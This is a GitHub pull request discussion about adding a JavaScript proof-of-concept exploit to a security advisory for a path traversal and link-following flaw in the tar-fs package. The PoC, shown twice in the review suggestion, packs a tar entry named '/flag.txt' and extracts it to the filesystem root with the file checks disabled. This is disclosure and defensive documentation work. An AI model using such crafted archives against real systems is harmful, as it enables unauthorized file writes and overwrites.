[GHSA-pq67-2wwv-3xjx] tar-fs Vulnerable to Link Following and Path Traversal via Extracting a Crafted tar File

[AryazE]

Updates

• Description

Comments
Add PoC exploit

[Copilot]

Pull Request Overview

This PR adds a Proof of Concept (PoC) exploit to a GitHub Security Advisory for a tar-fs vulnerability related to link following and path traversal attacks.

• Adds a JavaScript code example demonstrating how the vulnerability can be exploited
• Updates the modification timestamp to reflect the content change

Comments suppressed due to low confidence (1)

advisories/github-reviewed/2025/03/GHSA-pq67-2wwv-3xjx/GHSA-pq67-2wwv-3xjx.json:1

• The PoC demonstrates extracting to the root directory '/' which could be dangerous if accidentally executed. Consider using a safer example path like './test-extract' or documenting that this is for demonstration purposes only and should not be run in production environments.

{

---

_{Tip: Customize your code reviews with copilot-instructions.md. Create the file or learn how to get started.}

[Copilot]

The PoC attempts to write to '/flag.txt' (absolute path at filesystem root) which demonstrates the path traversal vulnerability but could cause harm if executed. Consider adding a warning comment that this code should only be used for understanding the vulnerability and not executed in real environments.

Suggested change

"details": "An Improper Link Resolution Before File Access (\"Link Following\") and Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\"). This vulnerability occurs when extracting a maliciously crafted tar file, which can result in unauthorized file writes or overwrites outside the intended extraction directory. The issue is associated with index.js in the tar-fs package.\n\n### PoC\n```javascript\n// Create a writable stream to extract the tar content\nconst extractStream = tarfs.extract('/', {\n // We can ignore the file type checks to allow the extraction of the malicious file\n ignore: (name) => false,\n});\n\n// Create a tar stream\nconst tarStream = tarfs.pack().on('error', (err) => {\n throw err;\n});\n\n// Append the malicious entry to the tar stream\ntarStream.entry({ name: '/flag.txt', mode: 0o644 }, Buffer.from('This is a flag!'));\n\n// Finalize the tar stream\ntarStream.finalize();\n\n// Pipe the tar stream into the extract stream\ntarStream.pipe(extractStream);\n```\n\nThis issue affects tar-fs: from 0.0.0 before 1.16.4, from 2.0.0 before 2.1.2, from 3.0.0 before 3.0.7.",

"details": "An Improper Link Resolution Before File Access (\"Link Following\") and Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\"). This vulnerability occurs when extracting a maliciously crafted tar file, which can result in unauthorized file writes or overwrites outside the intended extraction directory. The issue is associated with index.js in the tar-fs package.\n\n### PoC\n```javascript\n// WARNING: This code is for educational purposes only.\n// Do NOT run in production or real environments.\n// Create a writable stream to extract the tar content\nconst extractStream = tarfs.extract('/', {\n // We can ignore the file type checks to allow the extraction of the malicious file\n ignore: (name) => false,\n});\n\n// Create a tar stream\nconst tarStream = tarfs.pack().on('error', (err) => {\n throw err;\n});\n\n// Append the malicious entry to the tar stream\ntarStream.entry({ name: '/flag.txt', mode: 0o644 }, Buffer.from('This is a flag!'));\n\n// Finalize the tar stream\ntarStream.finalize();\n\n// Pipe the tar stream into the extract stream\ntarStream.pipe(extractStream);\n```\n\nThis issue affects tar-fs: from 0.0.0 before 1.16.4, from 2.0.0 before 2.1.2, from 3.0.0 before 3.0.7.",

[github-actions]

👋 This pull request has been marked as stale because it has been open with no activity. You can: comment on the issue or remove the stale label to hold stale off for a while, add the Keep label to hold stale off permanently, or do nothing. If you do nothing this pull request will be closed eventually by the stale bot. Please see CONTRIBUTING.md for more policy details.

[AryazE]

Since there is no public exploit available for this vulnerability, I think this PR is useful.

[shelbyc]

Hi @AryazE, how did you find/develop this PoC? Is it available anywhere other than this PR as a reference link?

[AryazE]

I generated them with a tool (more details at https://arxiv.org/abs/2506.04962).
This CVE was among those that did not have a public PoC, and we could generate a working exploit for it.

[advisory-database]

Hi @AryazE! Thank you so much for contributing to the GitHub Advisory Database. This database is free, open, and accessible to all, and it's people like you who make it great. Thanks for choosing to help others. We hope you send in more contributions in the future!